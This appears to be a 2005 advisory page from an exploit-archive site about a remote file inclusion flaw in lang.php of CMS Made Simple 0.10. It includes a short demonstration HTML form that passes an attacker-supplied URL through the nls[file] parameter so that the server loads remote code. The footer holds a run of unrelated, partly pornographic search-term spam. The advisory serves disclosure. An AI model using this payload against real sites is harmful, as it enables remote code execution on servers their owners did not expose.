about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , CMS Made Simple Lang.PHP Remote File Include Vulnerability


Title CMS Made Simple Lang.PHP Remote File Include Vulnerability
Published 2005-08-31-12:00AM
Updated 2005-09-26-03:59PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  groszynskif@gmail.com is credited with the discovery of this vulnerability.
Vulnerable  CMS Made Simple CMS Made Simple 0.10
Not Vulnerable  CMS Made Simple CMS Made Simple 0.10.1
Code   No exploit is required:

A demonstration exploit html file is provided:

example.html:
<form action="http://www.example.com/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 16:51:24 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.1aaat. 0-Char www.qqhote 2...om_log Searching 200+%252Fc SEXTOONS.C CMS is Fre serv-u 6.1 sex.sex.se Phonerotic dasebaba.c Munmun sen Ghaziabad trip boat good+fuck+ Hotmail nova eliza downLoad free-sampl Xxx movie jops www.mayala Sabdrimer root windo blowjop guaranteed mtt Gym class admentor netid BNC 1.6 Trt sex gay ph shopcart v Jody srvloc Manager_Ac verygame Www.zzl.c6 result for WWW.south desibaba bbwsex.tv www.yotoub Www.Desiba modernbill www.j8a.cn Narutoporn Gambar cin